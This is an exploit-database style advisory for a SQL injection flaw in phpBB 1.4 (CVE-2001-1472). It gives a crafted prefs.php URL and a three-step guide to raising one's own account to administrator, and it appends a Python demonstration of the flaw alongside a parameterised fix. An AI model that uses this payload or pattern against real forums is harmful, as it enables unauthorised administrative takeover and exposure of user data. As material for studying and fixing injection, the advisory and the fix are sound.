phpBB 1.4 Remote SQL Query Manipulation Vulnerability. CVE-2001-1472. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/3142/info

phpBB is free, open-source, easy-to-use web forums software.

An issue exists in phpBB which allows a remote attacker to manipulate SQL queries in such a way as to gain an administrative account with the service. This problem is due to improper validation of user-supplied input by certain variables in phpBB.

This issue can be exploited by making a cleverly crafted web request that contains arbitrary user-supplied replacement values.

One consequence of successful exploitation is that the attacker will be privy to user information.

http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23

Summary:

1. Register an account on a phpBB board version 1.4.x.
2. Enter above URL with the correct sitename and replace l337h4x0r with your username.
3. Click on "Administration Panel" near the bottom of the page.
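The flaw class described above and its fix, as an added example (not phpBB's code and not part of the advisory). The table name `users`, the columns `user_viewemail` and `user_id`, and all function names are assumptions; only `viewemail`, `user_level`, `username` and the request value come from the page. The concatenated statement is built as a string and never executed.

```python
import sqlite3
from urllib.parse import unquote

# viewemail value from the request shown on this page, URL-decoded.
PAGE_VIEWEMAIL = unquote("1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23")

def build_update_unsafe(viewemail, user_id):
    """Flawed pattern: the request value is concatenated into the SQL text."""
    return ("UPDATE users SET user_viewemail='" + viewemail +
            "' WHERE user_id=" + str(int(user_id)))

def parse_flag(raw):
    """Allow-list check: the preference is a yes/no flag, so accept only '0' or '1'."""
    if raw not in ("0", "1"):
        raise ValueError("viewemail must be 0 or 1")
    return int(raw)

def save_prefs(db, session_user_id, raw_viewemail):
    """Hardened: validated value, bound parameters, row picked by the session's user id."""
    flag = parse_flag(raw_viewemail)
    cur = db.execute("UPDATE users SET user_viewemail=? WHERE user_id=?",
                     (flag, session_user_id))
    db.commit()
    return cur.rowcount

def make_db():
    # Constructed sample data (hypothetical schema).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT,"
               " user_level INTEGER, user_viewemail INTEGER)")
    db.executemany("INSERT INTO users VALUES (?,?,?,?)",
                   [(1, "admin", 4, 0), (2, "alice", 1, 0)])
    return db

def demo():
    db = make_db()
    # The quote ends the string literal early, the extra SET clause and WHERE
    # become SQL, and '#' (a MySQL comment) discards the application's own WHERE.
    unsafe_sql = build_update_unsafe(PAGE_VIEWEMAIL, 2)
    try:
        save_prefs(db, 2, PAGE_VIEWEMAIL)
        rejected = False
    except ValueError:
        rejected = True
    changed = save_prefs(db, 2, "1")  # legitimate request still works
    row = db.execute("SELECT user_level, user_viewemail FROM users"
                     " WHERE user_id=2").fetchone()
    return unsafe_sql, rejected, changed, row

if __name__ == "__main__":
    for item in demo():
        print(item)
```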